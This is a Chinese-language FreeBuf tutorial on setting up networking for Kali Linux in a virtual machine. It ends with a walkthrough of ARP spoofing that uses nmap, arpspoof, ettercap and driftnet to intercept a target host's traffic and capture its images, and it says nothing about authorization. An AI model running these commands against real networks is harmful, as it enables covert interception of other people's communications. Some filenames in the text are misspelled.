freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

对Kali进行网络配置并进行ARP欺骗
2018-03-27 08:30:38

1、此文章所使用的配置方法是我经多次尝试,确定无误的步骤,但因为每个人的环境不同,所以仅供参考。

2、第一次发表,若有不足,还请指正。

Kali的网络配置

上网方式

1、桥接(宽带下不可用!!!)

虚拟机与主机在同一个网段中,并且也要为虚拟机分配一个IP地址(不要与主机IP地址相同,也不要与主机所在局域网中的其他计算机IP地址相同),为虚拟机设置子网掩码、网关地址、DNS地址。除了IP地址不同,其他都相同。

2、NAT

虚拟机使用“NAT”(即VMnet8)虚拟网卡,并且在虚拟机中设置为“自动获得地址”,虚拟机就可以上网

网络故障问题的解决方法

1、查看自己ip地址、子网掩码等信息

ifconfig 

如不显示inet地址,则可能是smbd.server没开,应输入

/etc/init.d/smbd start

或输入

dhclient eth0

命令来获取IP地址

再输入ifconfig命令,就能看到eth0已经有IP地址了

配置网络

vi /etc/network/interfaces

修改为如下形式

#This file describes the network interfaces available on your system             

# and how to activate them. For more information, see interfaces(5).

 

# The loopback network interface

 auto lo

iface lo inet loopback

 

# The primary network interface

allow-hotplug eth0

iface eth0 inet static                //配置eth0使用默认的静态地址

# address 192.168.0.133        //设置eth0的IP地址

# netmask 255.255.255.0          //配置eth0的子网掩码

# gateway 192.168.0.254        //配置当前主机的默认网关

waddress ether 00:50:56:3D:9E:D2      //配置MAC地址

修改文件夹内文本数据时用vi命令,i键进入修改模式,修改后按ESC退出修改模式,输入 :w 保存,输入 :q 退出文件

配置DNS

Kali Linux的DNS服务器地址使用文件“/etc/resovl.conf”进行配置,用户可以通过“nameserver”配置项设置DNS服务器的 IP地址;

“resolv.conf”文件中最多可以使用“nameserver”指定3个DNS服务器,按照先后的顺序,一旦前面的DNS服务器失效,系统将自动使用后面的DNS服务器。

对于“resolv.conf”文件设置“nameserver”的修改是即时生效的,即只要对“resolv.conf”文件的修改进行了保存,在系统下一次需要进行域名的解析时就会按照该文件中指定的DNS服务器IP地址进行域名的解析。

vi /etc/resovl.conf

修改格式如下

# Generated by NetworkManager

nameserver 192.168.229.2     //Nat模式下为虚拟机网卡IP,桥接模式下为主机分配的IP

nameserver 114.114.114.114

nameserver 8.8.8.8

 重启网卡

/etc/init.d/networking restart

 ping

      ping 114.114.114.114

      ping 8.8.8.8

ARP欺骗方法

nmap扫描内网主机

nmap -sP 192.168.0.0/24

查看目标主机操作系统信息

nmap -O 192.168.0.133

开启流量转发功能

echo 1 >> /proc/sys/net/ipv4/ip_forward

使用arpspoof或ettercap,选一个进行arp欺骗。获取从192.168.0.1(路由器) 到 192.168.0.21(目标机)的流量。

使用arpspoof(无线网络下,有线网络则先ip,后网关):

arpspoof -i eth0 -t 192.168.1.1(网关) 192.168.1.*(ip)

arpspoof -i eth0 -t 192.168.0.1  192.168.0.21

使用ettercap:

ettercap -T -q -M ARP /192.168.0.21// ///

driftnet图片流量监控

driftnet -i eth0

*本文作者:kabeor,转载请注明来自FreeBuf.COM

# Kali # arp
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者